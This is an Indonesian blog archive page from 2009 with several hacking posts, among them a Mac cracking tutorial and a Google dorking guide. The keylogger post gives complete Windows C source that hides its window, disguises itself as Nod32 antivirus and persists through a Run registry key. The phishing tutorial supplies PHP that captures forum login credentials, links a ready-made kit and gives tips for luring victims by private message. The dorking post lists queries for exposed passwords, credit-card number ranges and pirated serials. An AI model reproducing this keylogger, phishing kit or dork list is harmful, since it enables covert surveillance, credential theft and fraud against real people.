Gunakan Mesin Pencari


Google





24 Februari 2009

MAC OS X Reversing Tutorial for Beginner



Kracking Tools
Sebelum kita mulai tentunya kita harus mengetahui tools2 apa saja yang akan kita gunakan. Apakah kita akan menggunakan Olly Debugger sama seperti di windows?tentu tidak karena sejauh ini belum ada yang membuat kracking tools dengan tampilan GUI seperti OllyDbg. Tools yang akan kita gunakan antara lain:
1. Debugger, untuk keperluan ini kita gunakan gdb. GDB dibundle jadi satu dengan Apple Developer Tools.
2. Disassembler, kita akan menggunakan otx dari http://otx.osxninja.com dan class-dump
3. HexEditor, kita akan menggunakan 0xED.
gdb
GDB adalah GNU Project Debugger, yang akan digunakan untuk melakukan tracing selama program di eksekusi. Dengan adanya gdb, kita bisa melakukan tugas2 antara lain:
1. Start program atau attach program yang telah berjalan
2. Break, untuk menghentikan sementara program yang sedang berjalan seakan2 program tersebut hang
3. Mengetahui apa yang terjadi selama program tersebut berhenti.

GDB sudah dibundling dengan XCode, jadi jika sudah menginstall XCode, tinggal jalankan gdb aja.

otx

“otx stands for "object tool extended". It uses otool (object tool) to disassemble a Mach-O executable file, then enhances the disassembled output. Simple enhancements include adding the machine code of each instruction and the offset of each instruction from the beginning of a function.
More complicated enhancements include displaying the names and data types of Objective-C methods even if symbols have been stripped, and adding comments that describe member variables, function calls, static data and more.”
-taken from http://otx.osxninja.com/otwtf.html

You might also be asking yourself what the hell a disassembler is. I’ll tell you what it is...with some help from Wikipedia: http://en.wikipedia.org/wiki/Disassembler

class-dump
Aplikasi yang mendisassemble suatu program dengan mengeluarkan hanya judul class-nya saja.

HexEditor
“A hex editor is a program which allows you to edit compiled programs and binary data-files. These editors are called hex editors because they most often present data in hexadecimal format. Hexadecimal is used because it is easier for most humans than working in binary. In addition, hexadecimal is frequently useful because computers tend to work with 8-bit bytes of information and because ASCII is an 8-bit code.”
- taken from http://www.tech-faq.com/hex-editor.shtml

Hehe... agak males nulisnya jadi copy paste ajah. Ok, langsung aja tu de poin. Dalam melakukan kracking, tentu dikenal tahapan2 yang harus dilakukan yaitu Testing untuk mengetahui bagian mana yang akan dipatch, Disassembling, Debugging untuk mengetahui bagian mana yang seharusnya di-patch dan yang terakhir adalah Patch.

Testing
Tahapan ini adalah menjadi sangat penting karena mulai dari sini kita bisa mengetahui perilaku program tersebut, apakah menggunakan serial checking, file lisensi, online activation dll.


tunggu sambungannya yach.....



Sumber
Sambungannya disini...

21 Februari 2009

Cara Download Dari Google Book Search



Sebagian dari Anda mungkin sudah membaca artikel di sini dan di sini yang membahas tentang bagaimana Anda dapat membaca buku dan majalah secara gratis lewat Google Book Search.

Secara “normal” Anda hanya dapat membaca secara online dan tidak dapat mendownload buku dan majalah tersebut. Tetapi dengan menggunakan software Google Book Downloader Anda dapat mendownload dan menyimpan buku tersebut sebagai file PDF.

Untuk mendownload dari Google Book Search dengan menggunakan Google Book Downloader, caranya sebagai berikut:

1. Jalankan aplikasi Google Book Downloader.
2. Tulis kode buku yang akan didownload pada kotak isian Book code.
3. Tekan tombol Check.
4. Tekan tombol Download all.
5. Tekan tombol Save entire book as…

Lama proses yang dibutuhkan untuk mengecek dan mendownload sangat variatif, tergantung kecepatan koneksi internet dan banyak sedikitnya halaman buku yang bisa didownload.


sumber
Sambungannya disini...

16 Februari 2009

Local KeyLogger



untuk yang suka main2 dengan yang namanya keylogger. Ini script tinggal di compile aja yah, silahkan dikembangin jika ada yang ingin mengembanginnya..

Code :
===========start================
#include
#include
#define KEY "c:\windows\Nod32Bak.exe"
#define LOG "c:\log.txt"

int keylogging(void)
{
short lul;
while(1)
{
Sleep(5);
for(lul=8;lul<=222;lul++)
{
if(GetAsyncKeyState(lul)==-32767)
{
FILE *fp;
fp = fopen(LOG,"a+");
if(fp == NULL)
{
return 1;
}
if(fp != NULL)
{
if((lul >= 39) && (lul <= 64))
{
fputc(lul,fp);
fclose(fp);
break;
}
else if((lul > 64) && (lul < 91))
{
lul+=32;
fputc(lul,fp);
fclose(fp);
break;
}
else
{
switch(lul)
{
case VK_SPACE:
fputc(' ',fp);
fclose(fp);
break;
case VK_SHIFT:
fputs("[SHIFT]",fp);
printf("[SHIFT]");
fclose(fp);
break;
case VK_RETURN:
fputs(" [ENTER]",fp);
fclose(fp);
break;
case VK_BACK:
fputs("[BACKSPACE]",fp);
fclose(fp);
break;
case VK_TAB:
fputs("[TAB]",fp);
fclose(fp);
break;
case VK_CONTROL:
fputs("[CTRL]",fp);
fclose(fp);
break;
case VK_DELETE:
fputs("[DEL]",fp);
fclose(fp);
break;
case VK_OEM_1:
fputs("[;:]",fp);
fclose(fp);
break;
case VK_OEM_2:
fputs("[/?]",fp);
fclose(fp);
break;
case VK_OEM_3:
fputs("[`~]",fp);
fclose(fp);
break;
case VK_OEM_4:
fputs("[ [{ ]",fp);
fclose(fp);
break;
case VK_OEM_5:
fputs("[\|]",fp);
fclose(fp);
break;
case VK_OEM_6:
fputs("[ ]} ]",fp);
fclose(fp);
break;
case VK_OEM_7:
fputs("['"]",fp);
fclose(fp);
break;
case VK_NUMPAD0:
fputc('0',fp);
fclose(fp);
break;
case VK_NUMPAD1:
fputc('1',fp);
fclose(fp);
break;
case VK_NUMPAD2:
fputc('2',fp);
fclose(fp);
break;
case VK_NUMPAD3:
fputc('3',fp);
fclose(fp);
break;
case VK_NUMPAD4:
fputc('4',fp);
fclose(fp);
break;
case VK_NUMPAD5:
fputc('5',fp);
fclose(fp);
break;
case VK_NUMPAD6:
fputc('6',fp);
fclose(fp);
break;
case VK_NUMPAD7:
fputc('7',fp);
fclose(fp);
break;
case VK_NUMPAD8:
fputc('8',fp);
fclose(fp);
break;
case VK_NUMPAD9:
fputc('9',fp);
fclose(fp);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",fp);
fclose(fp);
break;
default:
fclose(fp);
break;
}
}
}
}
}
}
}
int main(int argc, char **argv)
{
CopyFile(argv[0], KEY, 0);

HWND own = FindWindow(0,argv[0]);
ShowWindow(own, SW_HIDE);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\Mcft\Windows\CurrentVersion\Run",0,KEY_SET_VALUE,&hKey);
RegSetValueEx(hKey,"Nod32 Anti-Virus",0,REG_SZ,(const unsigned char*)KEY,sizeof(KEY));
RegCloseKey(hKey);

CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging,0,0,0);
system("pause");
}
=============END==============


Sumber
Sambungannya disini...

11 Februari 2009

Tutorial Phising Forum



Nah kita mulai saja...
pertama2 anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt

nah pada file next.php masukkan code ini

Code:
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://target.com");
$handle = fopen("ppp.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>



atau untuk lebih memudahkan anda saya sudah sedian disini...

Code:
http://www.mediafire.com/?diddyvyxkwo



setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..
pada forum target cari halaman loginnya...
setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)

copy paste seluruh source codenya ke file index.html yang anda telah sediakan...
edit index.html anda trus cari method="post" dan gantikan dengan method="get"
cari juga action="alamat link" gantikan dengan action="next.php"

dengan itu password log akan disafe di file ppp.txt

sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)

setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error
nah kita umpakan target kita terlihat seperti http://dickdownload.com/ copy url

terus pada index.html kita search href=
nah kita ganti . dengan alamat forum dia...
contohnya:

kita menemukan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css

nah lakukan begitu pada semua href link...
nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...

selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???
tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....


nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan

1. Diharapkan menggunakan phising forum pada pm ( private message)
2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3. Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)
5. Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).

nah ini contoh yang sering gue pake di forum luar sana
"Hey is this yours post?" atau "Did you uploaded this?" trus gue masukin deh
[url=phising link anda]contoh link yang ditujuh[/url]


Sumber


Sambungannya disini...

08 Februari 2009

Google Hacking



Google merupakan satu dari beberapa perusahaan sangat besar didalam bidang bisnis internet. Selain menjadi satu dari beberapa perusahaan terbesar di dunia internet ini, google juga ternyata menjadi satu dari beberapa website yang dapat dikatakan memiliki jumlah catatan pengunjung terbanyak, bagaimana tidak? Segala sesuatu yang sehubungan dengan internet sekarang ini semuannya dapat dicari melalui google, dari data mengenai masalah umum, berita, hingga informasi teknis
Berbicara sehubungan dengan sub judul artikel ini, yang berbunyi “Taking Advantage of Technology”, dalam artikel kali ini saya akan sedikit membahas mengenai sebuah tehnik hacking yang menggunakan layanan yang diberikan daripada google ini sendiri.

Seperti yang telah kita ketahui, bahwa dengan adanya kemajuan teknologi dan semakin berkembangnya industri internet, tentu juga banyak hal hal lain yang terjadi sehubungan dengan system keamanan. Majunya sebuah jenis teknologi, tentu akan diimbangi dengan tehnik “men-dobrak” daripada system itu sendiri. Ini dapat kita lihat dalam kasus google.com sebab telah diketahui bahwa selain berguna sebagai sebuah search engine paling ampuh dengan database yang mencapai miliaran jumlahnya, google pun tidak dapat menutupi kenyataan bahwa banyak hacker yang menggunakan google.com sebagai sarana melakukan tindak “iseng-iseng” di internet, sebab selain dapat mencari data data seperti MP3, Film, Artikel, dan lain sebagainyam google pun memiliki kemampuan untuk dapat mencari data yang dapat digolongkan sebagai data rahasia.

Dengan menggunakan sedikit kemampuan unik, dan tentunya dengan menggunakan google.com sebagai sarana pencarian data, ternyata orang dapat menemukan banyak data sensitive di Internet. Data data yang dimaksud dengan data sensitive adalah data yang dapat digolongkan sebagai data pribadi, seperti nomor kartu kredit, dan password.

Menggunakan google tentunya sudah bukanlah merupakan sebuah hal yang aneh lagi bagi mereka yang sering menggunakan internet. Ditambah lagi, mengingat penggunaan daripada website google.com itu sendiri yang sangat user-friendly, penulis merasa tidak perlu untuk menjelaskan lebih lanjut mengenai metode mencari dengan menggunakan google. Dalam artikel ini kita akan membahas lebih kearah dasar metode pencarian serta pengenalan string dalam penggunaannya di google.com serta contoh contoh bentuk kalimat pencarian yang sangat membantu dalam melakukan google hacking nantinya.

Tehnik Dasar Pencarian

* Penggunaan string (+) digunakan untuk melakukan pencarian paksa terhadap huruf yang serupa. Sedangkan (-) digunakan untuk men-tidak sertakan sebuah kata dalam pencarian.
* Untuk mencari sebuah susunan kata tertentu dengan sangat tepat, maka anda perlu menggunakan string (“ “)
* Sedangkan titik (.) digunakan untuk melakukan metode pencarian text satu karakter.
* Tanda bintang melambangkan segala huruf.
* Syntax site: digunakan untuk memerintahkan google supaya melakukan pencarian dalam situs tertentu saja. Alamat situsnya dapat dimasukan sesudah tanda titik dua. (e.g site:www.th0r.name)
* Syntax filetype: digunakan untuk memerintahkan google untuk melakukan pencarian terhadap jenis file secara ter-spesifikasi. Jenis file yang ingin dicari dapat diposisikan setelah tanda titik dua.
* Syntax link: digunakan untuk memerintahkan google supaya hanya melakukan pencarian dalam hyperlinks tertentu.
* Syntax cache: digunakan untuk memerintahkan google untuk menampilkan versi daripada sebuah webpage pada saat google membukanya. Keterangan mengenai alamat website dapat ditambahkan pada bagian akhir sesudah tanda titik dua.
* Syntax intitle: dalam hal ini google diperintahkan hanya untuk mencari keterangan berdasarkan title daripada dokumen dokumen tertentu, sesuai dengan yang kita ketikan pada bagian akhir syntax setelah tanda titik dua.
* Syntax inurl: Google akan melakukan pencarian data dalam syntax URL tertentu yang diberikan setelah tanda titik dua.


Mengenal lebih dalam Syntax Untuk Google Hacking
Setelah mengenal dasar metode pencarian menggunakan google.com, sekarang kita akan beralih ke syntax yang dapat dikatakan lebih specific dan lebih komplikasi dibandingkan syntax yang telah diberikan diatas. Mari sekarang kita perhatikan syntax dibawah ini:

intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurlasslist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Contoh contoh yang diberikan diatas adalah contoh contoh syntax yang bias dikatakan digunakan untuk mencari password ataupun admin page, dan juga bias digunakan untuk mencari page yang tidak seharusnya dapat dibuka oleh user biasa. Kombinasi kombinasi lain dapat digunakan untuk melakukan pencarian yang lain dan hanya perlu dimodifikasi sesuai dengan kebutuhan dan target anda.
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
Sedangkan syntax yang diatas ini digunakan untuk mencari nomor kartu kredit orang menggunakan google.com

Bedah Syntax
Setelah melihat beberapa syntax yang lebih complex diatas, mari kita sedikit membahas maksud dari syntax syntax yang ada dibawah ini.
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Seperti yang dapat kalian perhatikan dari keseluruhan syntax. Bagian yang diganti hanya selalu pada bagian sesudah kata “Parent Directory”. Kenapa? Setelah kita pelajari dibagian awal artikel ini tadi bahwa syntax (“ “) digunakan untuk melakukan pencarian kalimat secara pasti, dan (-) digunakan untuk men-tidak ikut sertakan sebuah kata dalam keseluruhan kalimat pencarian. Sehingga dalam syntax ini dapat kita artikan secara kasar juga sebagai berikut:

* “Parent Directory”  Pencari sedang melakukan pencarian untuk kata Parent Directory secara pasti dan tidak secara terpencar (Parent sendiri dan Directory sendiri)
* Pencari menaruh apa yang ingin dia cari. (Contoh : /appz/ adalah aplikasi. Dan MP3, berarti dia mencari mengenai hal MP3)
* -xxx  Pencari tidak menginginkan adanya konten xxx dalam pencariannya.
* -html  Pencari tidak menginginkan adanya konten html dalam pencariannya.
* -htm  Pencari tidak menginginkan adanya konten htm dalam pencariannya.
* -php  Pencari tidak menginginkan adanya konten php dalam pencariannya.
* Dan lain sebagainya.


List Syntax, serta Kombinasinya
Setelah membahas mengenai metode pencarian, syntax yang cukup komplikasi hingga beda arti syntax, pada bagian sebelumnya. Pada bagian ini kita akan membahas mengenai kombinasi syntax dan bagaimana fungsinya, serta bagaimana membaca arti syntax tersebut.
Inurl:Microsoft filetype:iso
Anda akan mencari pada setiap URL berbau kata Microsoft untuk segala file yang bertipe iso. Anda dapat merubah URL dan Filetype menjadi apapun sesuai kebutuhan anda.
"# -FrontPage-" inurl:service.pwd
Dengan menggunakan syntax ini, anda menyuruh google untuk mencarikan password frontpage untuk anda.
“http://*:*@www”
Syntax diatas digunakan untuk melakukan pencarian password pada line url anda. Dalam kasus ini anda mencari user dan password yang tulisannya apa saja, pada domain name tertentu. (Masukan nama domain tanpa .com .net / .org) – (Contoh : “http://*:*@www” neotek)
Cara lain untuk menggunakan syntax ini dalam bentuk yang berkesebalikan ialah dengan cara menuliskan syntax seperti ini:
“http://th0r:th0r@www”  dalam kasus ini anda mencari username dan password th0r pada website yang nantinya akan anda masukan alamatnya dibagian belakang.
“sets mode +k”
Nampak seperti IRC? Memang betul. Ada banyak juga room di IRC yang menggunakan key untuk melakukan join kedalam room tersebut dan dengan menggunakan syntax ini, anda akan dapat menemukan beberapa key yang tercatat dalam log percakapan channel / room tersebut.
Allinrul: Admin mdb
Kalian akan menemukan banyak web page sehubungan dengan administrator system page.
Intitle: “Index Of” config.php
Dengan syntax diatas, kalian akan diberikan setumpuk data mengenai website website yang memiliki file config.php
Bahkan google dapat juga dijadikan ajang untuk mencari warez serial code. Katakanlah anda membutukan Windows XP Pro serial number. Anda hanya perlu membuka http://www.google.com dan mengetikan syntax sebagai berikut:
“Windows XP Professional” 94FBR
Yang dapat juga kita artikan sebagai pencarian kata Windows XP Professional tanpa di pisahkan. Sedangkan 94FBR itu sendiri adalah sebuah code yang kerapkali dimasukan ke dalam bagian daripada registration code yang ada pada kebanyakan software Microsoft. Oleh dari karena hal tersebut, penggunaan code 94FBR mungkin akan cukup membantu dalam melakukan pencarian serial code. Akan tetapi, segalanya tetap dapat dimodifikasi sesuai dengan keinginan serta keperluan anda.
Sekian cerita singkat saya kali ini mengenai Google Hacking. Perlu diingat bahwa bagaimana tingkat kesuksesan dalam menggunakan google hacking ini adalah 100% tergantung daripada ide dan kreatifitas anda sendiri dalam mengkombinasikan syntax dan menyesuaikan data yang anda ketahui mengenai suatu target tertentu. Tapi yang perlu saya jelaskan disini, bahwa google hacking adalah salah satu tehnik yang cukup mengerikan apabila anda dapat menggunakannya dengan sangat baik. Hal inipun didukung dengan kenyataan bahwa kebanyakan ahli security di dunia telah menempatkan Google Hacking sebagai salah satu tehnik yang sejajar dan sama berbahayanya dengan SQL Injection, Cross-site Scripting dan Remote Execution Command.
Credit and Special Thanks To: Johnny Long With His Book Named as “Google Hacking”
Tak lupa juga saya mengucapkan terima kasih kepada Epel (Thanks yoo =P), Ignes (Yang sudah nemenin chat waktu lg buat ini artikel), Cindy (Yang juga sudah nemenin ngobrol sampe artikelnya kelar) Hehehe, juga Jeffry dan Nico. Serta beberapa teman teman saya yang lainnya.
Akhir kata, saya hanya ingin mengucapkan. Teknologi berkembang untuk di eksploitasi fungsi dan manfaatnya. Kalau meng-eksploitasi kekayaan alam itu salah, meng-eksploitasi funsi teknologi adalah sebuah hal dapat dikatakan bagus. Oleh dari karena itu, teruslah mencari keuntungan daripada penggunaan system itu sendiri.


Sumber

Sambungannya disini...

04 Februari 2009

Baca Majalah Gratis





Tidak cukup hanya menyediakan buku saja, kini Google Book Search juga menyediakan berbagai majalah yang bisa Anda baca gratis. Salah satu majalah yang cukup menarik adalah majalah komputer Maximum PC. Tidak hanya edisi baru aja, edisi lawas seperti edisi tahun 1998 juga masih dapat Anda baca.


Sambungannya disini...

Link Teman

- Blogger Indonesia -
- International Scholarship -
- Job Vacancy Indonesia -
- Info Lowongan Kerja -
- Beasiswa Indonesia Scholarship -
- Informasi Beasiswa Indonesia -
- Jedustech -
- Gambar Hantu -
- Kampung Halaman -
- Informasi Teknologi -
- Klik Promosi -
- Speechyourmind -
- Surat Kabar Online -
- Rismasari-dewi -
- Izal Teknik -
- Suhenx-suhenx -
- Manan Computer -
- Favorite Foot Ball -
- Gallery Photo -
- Empat Lawang-
- Macan Indonesia -
- Clydens -
- Exploe21 -
- Coretan Zian -
- Ancha-ary -
- Catatan Vicky -
- Blog Rijal -
- Griya Unik -
- Persahabatan -
- Pantun Puisi -
- Blog Dian -
- 27 Januari -
- Silemot Blog -
- Master Of Change -
- Chinupiyyan Blog -
- Informasi Dunia Olahraga -
- Frizzy Blog -
- Zeskya -
- Dokter Ceka -
- Nicholas Care -
- Realita Kehidupan -
- Techno Neo -
- Yor Answer see -
- 1001 World News -
- Chubby -
- Coretanku -
- Info Gaptek -
- Blog Teguh -
- Blog Elzenz -
- Bunda Azka -
- Blog Okta -




Pesan Sponsor



Sponsor Resmi




Ilkan Baris




Bisnis Online




Last Post

+ Pembajakan Account Facebook dan Cara Mencegahnya
+ Triks GPRS gratis
+ TRIK GRATIS cara nambah speed koneksi & rubah IP
+ Menembus proxy server dengan IP Desimal
+ Mesin Pencari Dokumen PDF dan MS Office
+ 500 Office Templates For Word, Excel and Power Poi...
+ Simpan Halaman Web Dalam Bentuk PDF
+ firefox optimizer
+ Meminimalisir serangan virus di komputer kita
+ Rahasia Browser Google Chrome

Shout Box


Free shoutbox @ ShoutMix




Free Blog Content



Sekilas Info

IP

Rank






Powered by  MyPagerank.Net




webcounter

Ari Afriawan's Profile
Ari Afriawan's Facebook Profile
Create your badge

Archives

+ Juli 2007
+ Agustus 2007
+ Februari 2008
+ September 2008
+ November 2008
+ Desember 2008
+ Januari 2009
+ Februari 2009
+ Maret 2009
+ April 2009
+ Juni 2009
+ Agustus 2009
+ Oktober 2009
+ November 2009
+ Mei 2010


Sponsor Resmi




Blog Teman


Informasi


Blog Tutorial
Blog Sharing
Blogger Indonesia
KampungBlog.com - Kumpulan Blog-Blog
Indonesia
100 Blog Indonesia Terbaik

Copy Code Berikut Ke Blog Anda


Arinov


Friends banner




Ari_Novita
Dunia Blogger
Segelas Air Putih
GADO-GADO

Photo Sharing and Video Hosting at Photobucket

Tukar Link
Image Hosted by ImageShack.us




Keep-My-Mind



Photobucket
SCIENTIFIC FASTING

Architectural Corner
Infokom 2008
www.sampara.com

Photobucket
hir
Photobucket
Free Template



Spirit of Going to Better Life -> Motivasi, soulful, renungan, hikmah, opportunity, bisnis, healthy & product
Tukar Link sevanusngeblog.blogspotcom
MiewzZ Blog
Blog Yos
Blogger